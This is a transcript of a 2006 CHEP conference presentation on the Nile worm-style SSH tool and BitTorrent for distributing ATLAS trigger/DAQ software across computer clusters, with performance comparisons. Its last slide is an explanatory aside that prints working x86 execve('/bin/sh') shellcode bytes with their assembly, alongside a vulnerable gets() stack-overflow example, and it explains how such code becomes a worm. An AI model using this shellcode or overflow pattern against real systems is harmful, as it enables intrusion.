Presentation is loading. Please wait.

Presentation is loading. Please wait.

Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, IFAE, Barcelona,

Similar presentations


Presentation on theme: "Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, IFAE, Barcelona,"— Presentation transcript:

1 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 1 02/14/2006, CHEP06, TIFR, Mumbai Worm and Peer To Peer Tools for Distribution and Management of ATLAS SW on TDAQ Clusters Hegoi Garitaonandia, IFAE, Barcelona, Spain Haimo Zobernig, University of Wisconsin, Madison, USA

2 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 2 02/14/2006, CHEP06, TIFR, Mumbai Outline ● Introduction and Motivation ● Nile, a Worm for Management and Distribution ● BitTorrent, a P2P for Distribution ● SW Distribution in ATLAS TDAQ ● Nile as Command Transport: Diagnostic Tools ● Conclusions and Further Work

3 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 3 02/14/2006, CHEP06, TIFR, Mumbai Introduction and Motivation ● ATLAS SW: 6GBytes per release, Large scale tests: over 600 nodes ● In some clusters outside CERN there is no SW distribution tool available ● Heterogeneous clusters ● Need of a lightweight tool. ● Two alternatives tested, with two different technologies: – A Worm: Nile – A Peer To Peer: BitTorrent ● Nile's additional usefull feature: – Propagation of executables.

4 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 4 02/14/2006, CHEP06, TIFR, Mumbai Nile, a Worm for Management and Distribution ● A script that uses worm technology to: – execute commands in a list of hosts – or copy files to/from them. ● Creates a hierarchical control network via worm propagation ● It takes as input: – a list of hosts – a list of hosts & propagation paths. ● Shutdown and network error recovery algorithm: – Reliable – Centralized logs ● Based on Distribulator, Rgang and Metasploit Project, but written from scratch. ● http://nile.ifae.es

5 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 5 02/14/2006, CHEP06, TIFR, Mumbai Nile, a Worm for Management and Distribution: Propagation of Executables Procedure: –Propagation with SSH transport to N machines (in parallel). –Nile protocol. –Launch the specified executable. –Propagation. Speed benefits in a 600 node cluster: –Maximum number of parallel SSH procs. is 25 in both cases ● Features: – Execution of shell commands – Perl script upload. – Run different commands on different computers. ● Recursive procedure: – Propagation with SSH transport to N machines. – Inherit SSH connection, receive a packet with routing info and payload. – Launch executable and ● Speed benefits in a 600 node cluster – With less than 25 processes per machine

6 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 6 02/14/2006, CHEP06, TIFR, Mumbai Nile, a Worm for Management and Distribution: File Distribution and Synchronization Features: –Incremental synchronization of the directories of many computers, with a directory in the main computer. –Copy files from many computers to the main one. –Via RSYNC on top of SSH or RSYNC on top of TCP. ● Procedure: – Similar to Nile in copy mode. – But synchronize, before jump. ● Throughput benefits:

7 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 7 02/14/2006, CHEP06, TIFR, Mumbai A P2P for File Distribution: BitTorrent (1) ● A distributed file sharing SW which adapts to network topology. ● Arquitecture: – Peers – Seeder – Metainformation file: ● File pieces information. ● pointer to the tracker. – Tracker – An adaptive algorithm ● Nile can be used to launch, check, monitor, and stop BitTorrent network.

8 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 8 02/14/2006, CHEP06, TIFR, Mumbai A P2P for File Distribution: BitTorrent (2)

9 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 9 02/14/2006, CHEP06, TIFR, Mumbai Quattor ● Quattor is a system administration toolkit – automated installation – configuration and management of clusters ● Publish & Pull arquitecture ● Can be configured with many SW repositories. ● But it wasn't used in these tests – Its behaviour was emulated – Simplest configuration: 1 repository – HTTP, no Squid cache's

10 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 10 02/14/2006, CHEP06, TIFR, Mumbai File Distribution in ATLAS TDAQ ● Two big tests with these tools so far – Large scale tests (see D.Burckhart's talk) – Pre-Series (see G.Unel's talk), (see M.Dobson's talk) ● Different working conditions ● Only one direct comparison ● Though some aspects cannot really be compared.

11 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 11 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Large Scale Tests with Unknown Network Topology ● 600 machines at CERN had to be installed locally with a 2GByte container file with the ATLAS TDAQ SW. ● The computers were spread over different physical locations – Virtual cluster. – No clear knowledge of the network topology. ● There were incompatibilities between the packaging systems – ATLAS SW – The official one in the cluster, RPM. ● The distribution of this file was an appropriate task for a P2P – BitTorrent 3.4

12 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 12 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Large Scale Tests with Unknown Network Topology ● BitTorrent – Adapted to the network topology – Performed better. ● With BT, when the number of nodes was incremented: – Correspondent switches from their labs added – The throughput increased. ● The bottle neck for parallel copy was the closest router – First tests a 100Mbps and then a 200Mbps one.

13 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 13 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Pre-Series with Known Network Topology ● Pre-Series is a small scale (10%) system the final ATLAS TDAQ (70 nodes). ● Its control network is the one of the figure above, with N=4 and different M for each switch. ● Nile is being used to synchronize the ATLAS SW, locally installed in all the machines with disk. ● Some performance measurements were taken (4 per point), with BT, Nile, and an emulation of a simple configuration of Quattor, for N=3 and M=4, 6 and 8.

14 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 14 02/14/2006, CHEP06, TIFR, Mumbai SW Distribution in Pre-Series with Known Network Topology Nile 2.0.2 configured in two stages: –Performed the best of all three. –Throughput was close to the expected value. The parallel copy can be understood as the simplest Quattor configuration: –Only one SW repository, HTTP, no Squid caches

15 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 15 02/14/2006, CHEP06, TIFR, Mumbai Nile as Command Transport: TDAQ Diagnostic Tools ● Nile in execute mode can be used as transport mechanism by other tools: – Reliable. – Centralized logs. ● A set of tools, currently under development, is being built on top Nile. ● Their objective is to provide, in a fast way: – Unix resource monitoring. – TDAQ infrastructure monitoring and diagnostic. – Deallocation of resources. – Diagnostic, etc.

16 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 16 02/14/2006, CHEP06, TIFR, Mumbai Conclusions ● When no SW package distribution tool is avaliable: – Need of a (temporary?) solution. – P2P & Worm ● The P2P BitTorrent: – Adaptability makes it suitable for unknown network topologies. – Nile or similar must be used to launch BT. ● The worm Nile: – Performs better for known & more symetrical network topologies – It can synchronize incrementally. ● Nile alone, or the combination of both for: – Future large scale tests outside CERN – Network commissioning. ● Nile is useful for command transport – Applications on top of it. – TDAQ specific applications

17 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 17 02/14/2006, CHEP06, TIFR, Mumbai Further Work ● Keep improving Nile. ● Develop TDAQ specific tools on top of Nile. ● Integration of BitTorrent with Quattor – Both pull oriented ● File system on top of P2P?

18 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 18 02/14/2006, CHEP06, TIFR, Mumbai ? ● http://nile.ifae.es http://nile.ifae.es ● http://www.bittorrent.com http://www.bittorrent.com ● http://quattor.org http://quattor.org ● http://fermitools.fnal.gov/rgang http://fermitools.fnal.gov/rgang ● http://www.metasploit.com http://www.metasploit.com ● http://distribulator.sourceforge.net http://distribulator.sourceforge.net

19 Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, hegoi@ifae.es, IFAE, Barcelona, Spainhegoi@ifae.es 19 02/14/2006, CHEP06, TIFR, Mumbai Worms in a Nutshell: Hacking for Dummies Exploiting a C/C++ Stack Overflow Bug: Text Stack Data paramaters for func. call environmental variables main's stack frame return address saved frame pointer local vars: e.g. a char buffer lower address char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x0 0\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0 c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd 1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; jmp 0x2a # 3 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes.string \"/bin/sh\" # 8 bytes get reference (need to know, where it is being executed) name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); 3 ways of saying the same thing new return address main(){ buggy(); } buggy(){ char buf[12]; gets(buff); } The expoit: 1) negociate with program's protocol, 2) send shellcode. If instead of execve("/bin/sh"), the shellcode repeats (1) & (2): WORM


Download ppt "Worm and P2P Tools for Distribution and Management of ATLAS SW on TDAQ Computer Clusters H.Garitaonandia, IFAE, Barcelona,"

Similar presentations


Ads by Google